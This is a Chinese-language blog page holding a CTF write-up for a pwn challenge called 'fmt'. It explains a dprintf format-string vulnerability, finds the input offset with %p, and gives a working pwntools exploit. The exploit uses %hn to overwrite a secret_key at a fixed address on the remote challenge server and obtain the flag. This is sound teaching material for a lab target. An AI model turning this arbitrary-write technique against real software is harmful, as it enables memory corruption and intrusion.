<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"whoamiuu.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.27.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="fmt一、思路  从反编译可以看到，只要secret_key等于0x1337c0de就能获得flag。题目中dprintf有明显格式化字符串漏洞，用户通过read函数可以控制dprintf的第二个参数。 dprintf函数原型如下  二、步骤step1首先验证漏洞，并找到输入的偏移（%p 是 printf 系列函数的格式说明符，用于以十六进制形式打印指针地址。）  从回显可以看到我们的输入aaaa">
<meta property="og:type" content="article">
<meta property="og:title" content="CTF题解：fmt">
<meta property="og:url" content="http://whoamiuu.github.io/2025/12/05/2025-12-07-fmt/index.html">
<meta property="og:site_name" content="Learn Blogs">
<meta property="og:description" content="fmt一、思路  从反编译可以看到，只要secret_key等于0x1337c0de就能获得flag。题目中dprintf有明显格式化字符串漏洞，用户通过read函数可以控制dprintf的第二个参数。 dprintf函数原型如下  二、步骤step1首先验证漏洞，并找到输入的偏移（%p 是 printf 系列函数的格式说明符，用于以十六进制形式打印指针地址。）  从回显可以看到我们的输入aaaa">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/main.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/key.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/dprintf.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/%25p.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/checksec.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/sec.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/stop0.png">
<meta property="og:image" content="http://whoamiuu.github.io/images/fmt/flag.png">
<meta property="article:published_time" content="2025-12-05T02:00:00.000Z">
<meta property="article:modified_time" content="2025-12-07T11:40:28.662Z">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://whoamiuu.github.io/images/fmt/main.png">


<link rel="canonical" href="http://whoamiuu.github.io/2025/12/05/2025-12-07-fmt/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://whoamiuu.github.io/2025/12/05/2025-12-07-fmt/","path":"2025/12/05/2025-12-07-fmt/","title":"CTF题解：fmt"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>CTF题解：fmt | Learn Blogs</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Learn Blogs</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">二进制安全学习笔记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#fmt"><span class="nav-number">1.</span> <span class="nav-text">fmt</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E6%80%9D%E8%B7%AF"><span class="nav-number">1.1.</span> <span class="nav-text">一、思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%AD%A5%E9%AA%A4"><span class="nav-number">1.2.</span> <span class="nav-text">二、步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#step1"><span class="nav-number">1.2.1.</span> <span class="nav-text">step1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#step2"><span class="nav-number">1.2.2.</span> <span class="nav-text">step2</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name"></p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://whoamiuu.github.io/2025/12/05/2025-12-07-fmt/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Learn Blogs">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="CTF题解：fmt | Learn Blogs">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CTF题解：fmt
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-12-05 10:00:00" itemprop="dateCreated datePublished" datetime="2025-12-05T10:00:00+08:00">2025-12-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-12-07 19:40:28" itemprop="dateModified" datetime="2025-12-07T19:40:28+08:00">2025-12-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Writeup/" itemprop="url" rel="index"><span itemprop="name">Writeup</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="fmt"><a href="#fmt" class="headerlink" title="fmt"></a>fmt</h1><h2 id="一、思路"><a href="#一、思路" class="headerlink" title="一、思路"></a>一、思路</h2><p><img src="/images/fmt/main.png" alt="image-20251201143612542"></p>
<p><img src="/images/fmt/key.png" alt="image-20251201143641369"></p>
<p>从反编译可以看到，只要secret_key等于0x1337c0de就能获得flag。题目中dprintf有明显格式化字符串漏洞，用户通过read函数可以控制dprintf的第二个参数。</p>
<p>dprintf函数原型如下</p>
<p><img src="/images/fmt/dprintf.png" alt="image-20251201144303972"></p>
<h2 id="二、步骤"><a href="#二、步骤" class="headerlink" title="二、步骤"></a>二、步骤</h2><h4 id="step1"><a href="#step1" class="headerlink" title="step1"></a>step1</h4><p>首先验证漏洞，并找到输入的偏移（<code>%p</code> 是 printf 系列函数的格式说明符，用于以十六进制形式打印<strong>指针地址</strong>。）</p>
<p><img src="/images/fmt/%25p.png" alt="image-20251201144829215"></p>
<p>从回显可以看到我们的输入aaaaaaaa（0x6161616161616161）在第5个参数处。</p>
<p>这里说明另两个格式化字符：</p>
<ol>
<li><p><code>%n</code> 是 printf 系列函数中<strong>唯一具有写入能力</strong>的格式说明符，它可以将<strong>已输出的字符数</strong>写入指定的内存地址。</p>
<table>
<thead>
<tr>
<th>格式符</th>
<th>写入大小</th>
<th>目标类型</th>
</tr>
</thead>
<tbody><tr>
<td><code>%n</code></td>
<td>4字节</td>
<td><code>int *</code></td>
</tr>
<tr>
<td><code>%hn</code></td>
<td>2字节</td>
<td><code>short *</code></td>
</tr>
<tr>
<td><code>%hhn</code></td>
<td>1字节</td>
<td><code>char *</code></td>
</tr>
<tr>
<td><code>%lln</code></td>
<td>8字节</td>
<td><code>long long *</code></td>
</tr>
</tbody></table>
</li>
<li><p><code>%c</code> 用于输出<strong>单个字符</strong>，将对应的参数解释为 unsigned char 并输出对应的ASCII字符。<code>%{value}c</code>则会输出value个字符</p>
</li>
</ol>
<p>结合这两个工具，我们可以构造形如<code>%{value_high}c%10$n</code>达到任意地址写。</p>
<h4 id="step2"><a href="#step2" class="headerlink" title="step2"></a>step2</h4><p><img src="/images/fmt/checksec.png" alt="image-20251201150911326"></p>
<p><img src="/images/fmt/sec.png" alt="image-20251201150852366"></p>
<p>checksec一下，程序没有PIE，地址固定。所以secret_key地址为0x404010，并且其低位已经是c0de，所以我们只需要将1337写入高位地址0x404012即可。</p>
<p>于是，我们尝试构造出payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = p64(<span class="number">0x404012</span>)</span><br><span class="line">count_high = <span class="number">0x1337</span> - <span class="number">8</span> <span class="comment">#减8是因为前面已经输出8字节地址</span></span><br><span class="line">payload += <span class="string">f&quot;%<span class="subst">&#123;count_high&#125;</span>c%5$hn&quot;</span>.encode()</span><br></pre></td></tr></table></figure>

<p>但是p64打包会产生一个空字符，dprintf遇到空字符会停止打印，就会出现只输出404012的情况，如下</p>
<p><img src="/images/fmt/stop0.png" alt="image-20251201152415578"></p>
<p>所以，我们尝试将目标地址放在pyload最后，exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#sh = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">sh = remote(<span class="string">&#x27;154.94.237.159&#x27;</span>,<span class="number">34548</span>)</span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">addr_high = <span class="number">0x404012</span></span><br><span class="line">value_high = <span class="number">0x1337</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">fmt_part = <span class="string">f&quot;%<span class="subst">&#123;value_high&#125;</span>c%7$hn&quot;</span>.encode()</span><br><span class="line"><span class="comment"># 先猜测一个偏移(比如%10hn)，运行一次得到第一段payload长16字节，8字节一个偏移，之前得到的5再加16/8得到7</span></span><br><span class="line">payload = fmt_part + <span class="string">b&quot;A&quot;</span> * (<span class="number">8</span> - <span class="built_in">len</span>(fmt_part) % <span class="number">8</span>)  <span class="comment"># 对齐到8字节</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;Payload length: <span class="subst">&#123;<span class="built_in">len</span>(payload)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload += p64(addr_high)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;Payload: <span class="subst">&#123;payload&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">b&quot;Enter data at your own risk: &quot;</span>)</span><br><span class="line">sh.send(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>



<p>运行结果</p>
<p><img src="/images/fmt/flag.png" alt="image-20251201154503256"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/12/04/2025-12-07-babyheap/" rel="prev" title="CTF题解: babyheap">
                  <i class="fa fa-angle-left"></i> CTF题解: babyheap
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/12/05/2025-12-07-ret2text/" rel="next" title="CTF题解：ret2text">
                  CTF题解：ret2text <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder"></span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
